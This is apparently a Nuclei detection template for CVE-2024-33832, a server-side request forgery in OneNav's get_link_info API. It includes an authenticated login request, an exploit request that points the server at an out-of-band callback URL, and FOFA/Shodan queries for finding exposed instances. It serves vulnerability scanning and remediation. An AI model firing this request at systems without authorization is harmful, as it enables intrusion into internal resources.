id: CVE-2024-33832

info:
  name: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: medium
  description: |
    OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  impact: |
    Authenticated attackers can force the server to make arbitrary requests via the url parameter in the get_link_info API.
  remediation: |
    Update OneNav to a version later than v0.9.35-20240318 that patches the SSRF vulnerability.
  reference:
    - https://github.com/Hebing123/cve/issues/39
    - https://nvd.nist.gov/vuln/detail/CVE-2024-33832
  classification:
    epss-score: 0.03161
    epss-percentile: 0.87254
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-33832
    cwe-id: CWE-918
  metadata:
    max-request: 2
    product: onenav
    fofa-query: icon_hash="1111283449"
    shodan-query: http.favicon.hash:1111283449
  tags: cve,cve2024,ssrf,onenav,oast,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?c=login&check=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}
      - |
        POST /index.php?c=api&method=get_link_info HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        url=http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'title":'
          - 'description":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a00473045022100e92f843ca22562d576c4c6178b51c89cdc0f8af412dbcbca6b14f1fc587ef4140220037e25541da49f1f1bb3a4b4e60097327dc6c832ac7f994da849be4e19a932ca:922c64590222798bb761d5b6d8e72950